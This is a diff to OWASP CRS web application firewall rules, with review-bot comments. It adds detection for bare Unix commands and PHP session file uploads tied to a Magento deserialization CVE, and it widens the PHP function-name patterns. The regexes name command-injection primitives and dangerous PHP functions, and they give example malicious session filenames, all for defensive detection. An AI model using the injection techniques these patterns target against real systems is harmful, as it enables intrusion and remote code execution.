+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932350 +# +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[
\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:aptitud|unam)e|d(?:f|ir|mesg)|env|h(?:istory|ostname|top)|i(?:d|ostat)|l(?:ast|s)|mysql(?:[^\s\x0b]{1,10}\b)?|p(?:s(?:ql)?|wd)|(?:reboo|vmsta)t|s(?:(?:cree|hutdow)n|et|u)|top|w(?:ho(?:ami|is)?)?)$" \ + "id:932350,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Direct Unix Command Execution (No Arguments)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/3',\ + tag:'OWASP_CRS',\ + tag:'OWASP_CRS/ATTACK-RCE',\ + tag:'capec/1000/152/248/88',\ + ver:'OWASP_CRS/4.23.0',\ + severity:'CRITICAL',\ + 
setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
 # -=[ SMTP commands ]=-
 #
@@ -1949,7 +2093,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n.*
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/137/134',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1983,7 +2127,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/137/134',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -2017,7 +2161,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \r\n.*
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/137/134',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
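Review bot: The new 932350 regex accepts the bare `^` prefix, is anchored with a trailing `$`, and lists `ARGS_NAMES` among its targets, so a request whose parameter is simply named `id`, `w`, `ps`, `ls`, `su` or `top` appears to satisfy `^id$` and score CRITICAL at PL3 (`?id=1` is about as common as a parameter name gets); please confirm this is intended and exercised by the false-positive tests, or reconsider whether `ARGS_NAMES` belongs in this rule's target list. The header comment states what the rule does but gives no indication of which request parts are expected to carry a bare command and why the no-argument case deserves its own rule, which a reader will need before excluding it; a sentence after `This rule is meant to block…` covering that would help. Minor: the target list is ordered `REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/*`, whereas 932238 in this file puts the two header targets last; matching the sibling's order makes the two rules easier to diff.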
@@ -2051,14 +2195,14 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx !(?:\d
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:932018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf b/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf
index a950395a33..cab7ebe9fd 100644
--- a/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf
+++ b/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.22.0
+# OWASP CRS ver.4.23.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2026 CRS project. All rights reserved.
 #
@@ -14,8 +14,8 @@
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -60,7 +60,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)<\
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-PHP',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -102,7 +102,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-PHP',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -123,7 +123,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b
 capture,\
 t:none,t:normalizePath,\
 msg:'PHP Injection Attack: Configuration Directive Found',\
- logdata:'Matched Data: %{TX.0} found within %{TX.933120_MATCHED_VAR_NAME}: %{TX.933120_MATCHED_VAR}',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
 tag:'application-multi',\
 tag:'language-php',\
 tag:'platform-multi',\
@@ -132,10 +132,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-PHP',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
- setvar:'tx.933120_matched_var=%{MATCHED_VAR}',\
- setvar:'tx.933120_matched_var_name=%{MATCHED_VAR_NAME}',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -159,7 +157,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFil
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-PHP',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -191,7 +189,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-PHP',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
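Review bot: The two 933120 hunks replace the `tx.933120_matched_var` / `tx.933120_matched_var_name` indirection with `%{MATCHED_VAR_NAME}: %{MATCHED_VAR}` directly in `logdata`; that indirection is the pattern CRS typically uses for chained rules, where `logdata` on the first link would otherwise report the last link's match. The action list visible here ends with the two score `setvar`s and a closing quote rather than `chain`, so the rule appears to be a single unchained rule and the simplification sound, but the operator line and rule header lie outside these hunks, so this should be confirmed before merging. Since the two TX variables disappear, a search for any remaining reference to `tx.933120_matched_var` in tests, documentation or exclusion examples would be prudent.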
@@ -228,7 +226,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)ph
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-PHP',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -265,7 +263,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:bzi
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-PHP',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -281,13 +279,13 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:bzi
 # The list of PHP functions is divided into four groups of varying attack/false positive risk.
 # Four separate rules are used to detect these groups of functions:
 #
-# - Rule 933150: ~237 words highly common to PHP injection payloads and extremely rare in
+# - Rule 933150: ~234 words highly common to PHP injection payloads and extremely rare in
 # natural language or other contexts.
 # Examples: 'base64_decode', 'file_get_contents'.
 # These words are detected as a match directly using @pmFromFile.
 # Function names are defined in php-function-names-933150.data
 #
-# - Rule 933160: ~36 words which are common in PHP code, but have a higher chance to cause
+# - Rule 933160: ~39 words which are common in PHP code, but have a higher chance to cause
 # false positives in natural language or other contexts.
 # Examples: 'chr', 'eval'.
 # To mitigate false positives, a regexp looks for PHP function syntax, e.g. 'eval()'.
@@ -314,8 +312,10 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:bzi
 #
 # Rule 933150 contains a small list of function names which are highly indicative of a PHP
 # injection attack, for example 'base64_decode'.
-# We block these function names outright, without using a complex regexp or chain.
-# This could make the detection a bit more robust against possible bypasses.
+# The rule uses a chained rule to require parentheses after function names.
+# This prevents false positives from substring matches (e.g., "intval" in "PaintValdosta").
+# Functions that commonly appear as English words/substrings are handled by rule 933160
+# with stricter regex-based function call syntax validation.
 #
 SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@pmFromFile php-function-names-933150.data" \
 "id:933150,\
@@ -333,10 +333,13 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-PHP',\
 tag:'capec/1000/152/242',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
- setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ chain"
+ SecRule MATCHED_VARS "@pm ( )" \
+ "t:none,\
+ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 #
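Review bot: The chained condition `SecRule MATCHED_VARS "@pm ( )"` only requires that a `(` or `)` occur somewhere in the variable that matched the phrase list, so it does not establish call syntax next to the function name, and the rewritten comment in the previous hunk ("require parentheses after function names") promises more than the rule checks. Since `@pm` cannot refer back to the phrase that matched, either state the weaker contract, e.g. `# The chained rule only requires a parenthesis somewhere in the same value — a cheap proxy for call syntax, not adjacency.`, or move the adjacency check into a regex the way 933160 does. The comment's `intval`/`PaintValdosta` example also no longer illustrates this rule, because `intval` is moved into the 933160 regex in this same commit (the `-370,7 +373,7` hunk) and the 933150 word count drops from ~237 to ~234; pick an example that is still in `php-function-names-933150.data`. Placing both `setvar` actions on the chained rule is right, since in ModSecurity non-disruptive actions on the first rule of a chain run as soon as that rule alone matches; the narrowed coverage (a value containing a listed name but no parenthesis no longer scores at PL1) should be stated in the comment and pinned by a test.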
@@ -370,7 +373,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 933160 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b\(?[\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|f(?:ile(?:group)?|open|puts)|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a)|m(?:d5|kdir)|o(?:pendir|rd)|p(?:assthru|open|r(?:intf|ev))|r(?:eadfile|trim)|s(?:t(?:rip_tags|at)|ubstr|ystem)|tmpfile|u(?:n(?:pac|lin)k|sort))(?:/(?:\*.*?\*/|/[^\n\r]*)|#[^\n\r]*|[\s\x0b\"])*[\"']*\)?[\s\x0b]*\([^\)]*\)" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b\(?[\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|f(?:ile(?:group)?|open|puts)|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a|ntval)|m(?:d5|kdir)|o(?:pendir|rd)|p(?:assthru|hpinfo|open|r(?:intf|ev))|r(?:eadfile|trim)|s(?:t(?:rip_tags|at)|ubstr|ystem)|tmpfile|u(?:n(?:(?:pac|lin)k|serialize)|sort))(?:/(?:\*.*?\*/|/[^\n\r]*)|#[^\n\r]*|[\s\x0b\"])*[\"']*\)?[\s\x0b]*\([^\)]*\)" \ "id:933160,\ phase:2,\ block,\ @@ -386,7 +389,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -442,7 +445,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|ARGS_NAMES|ARGS|XM tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
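Review bot: The new 933160 operator is toolchain output per the context comment (`crs-toolchain regex update 933160`), but the regex-assembly source it is generated from is not in this chunk; confirm that source gained the same three names (`intval`, `phpinfo`, `unserialize`) in this commit, otherwise the next regeneration silently reverts this line. The 933160 description earlier in the file (the `-281,13 +279,13` hunk) characterises its list as names that "are common in PHP code, but have a higher chance to cause false positives in natural language"; `phpinfo` and `unserialize` are moved here for substring-collision reasons rather than natural-language ambiguity, so a sentence such as `# Names are also placed here when they collide with substrings of ordinary words (e.g. 'intval').` would keep that description accurate.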
@@ -498,7 +501,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
@@ -546,13 +549,71 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|X tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-PHP',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Session File Upload Protection ] +# +# Detects attempts to upload files matching PHP session naming patterns. +# PHP session files typically follow the pattern: sess_ +# where session_id is typically 20-256 characters (varies by PHP version). +# Example sizes: +# 32 chars — MD5 hash (legacy default) +# 40 chars — SHA-1 hash +# 26 chars — MD5 with 5 bits/character encoding +# +# Modern PHP (7.1+) +# PHP 7.1+ uses session.sid_length (default 32, range 22–256) and session.sid_bits_per_character: +# +# | Bits/char | Character set | Regex | +# | 4 | 0-9a-f | [0-9a-f]{22,256} | +# | 5 | 0-9a-v | [0-9a-v]{22,256} | +# | 6 | 0-9a-zA-Z,- | [0-9a-zA-Z,-]{22,256} | +# +# Attackers can upload malicious serialized PHP objects with session filenames, +# then trigger deserialization by presenting a matching PHPSESSID cookie, leading +# to Remote Code Execution through PHP object injection. +# +# References: +# - CVE-2025-54236 (Magento - Session Reaper) +# - https://slcyber.io/assetnote-security-research-center/why-nested-deserialization-is-still-harmful-magento-rce-cve-2025-54236/ +# +# This rule blocks: +# - sess_abcdef1234567890opqrstxyz (standard session file) +# - /tmp/sess_d8ew88tqmabdcokhumchy8htqm (with path) +# - C:\temp\sess_maliciousfilename1234567890 (Windows path) +# +# Some AJAX uploaders use the nonstandard request headers X-Filename, +# X_Filename, or X-File-Name to transmit the file name to the server; +# scan these request headers as well as multipart/form-data file names. 
+#
+SecRule FILES|FILES_NAMES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx (?:^|[/\x5c])sess_[,\-0-9a-z]{20,256}$" \
+ "id:933220,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:lowercase,\
+ msg:'PHP Injection Attack: PHP Session File Upload Attempt',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-php',\
+ tag:'platform-multi',\
+ tag:'attack-injection-php',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'OWASP_CRS/ATTACK-PHP',\
+ tag:'capec/1000/152/242',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:933014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
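Review bot: The quantifier `{20,256}` in the 933220 operator disagrees with the rule's own comment, which gives `session.sid_length` a range of 22–256 and the legacy sizes as 26, 32 and 40; use `{22,256}` or add a comment line stating why 20 is the chosen floor. `FILES_NAMES` holds the names of the upload form fields rather than the uploaded file names, so listing it goes beyond the comment's "multipart/form-data file names" and differs from sibling 933111, which scans `FILES` plus the `X-Filename` header variants; either drop it or note the intent. The comment line `PHP session files typically follow the pattern: sess_` reads as if a placeholder for the session id is missing after the underscore; check the source line, since the rendering here may have dropped it.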
